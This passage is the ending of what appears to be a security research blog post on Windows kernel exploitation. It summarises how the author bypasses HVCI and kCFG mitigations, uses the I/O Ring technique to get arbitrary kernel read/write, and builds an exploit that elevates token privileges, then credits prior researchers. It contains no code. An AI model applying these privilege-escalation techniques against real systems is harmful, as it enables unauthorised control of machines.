Note: In the code I’ve also added how to use the gadget to only elevate token privileges. It should be enough to uncomment the line //#define TOKENPRIV 1 to test it.

Conclusion

In this article, I briefly introduced the HVCI and kCFG security mitigations and their impact on our original exploit. After that I described a way to bypass kCFG and I’ve shown how to use the I/O Ring technique to obtain an arbitrary read/write primitive in kernel space. Finally, I’ve shown how to craft an exploit that, using such read/write primitive, elevates the current process’s token privileges.

Credits

Connor McGarr for his blog post on HVCI and the other security mitigations in the Windows kernel.
Paolo Stagno and @tykawaii98 for their blog post on how to bypass kCFG and the discovery of the gadget.
Yarden Shafir for the discovery and explanation of the I/O Ring technique, used to obtain arbitrary read/write.

Contacts

If you have any questions, feel free to reach out at:

Cookie	Duration	Description
cookielawinfo-checbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.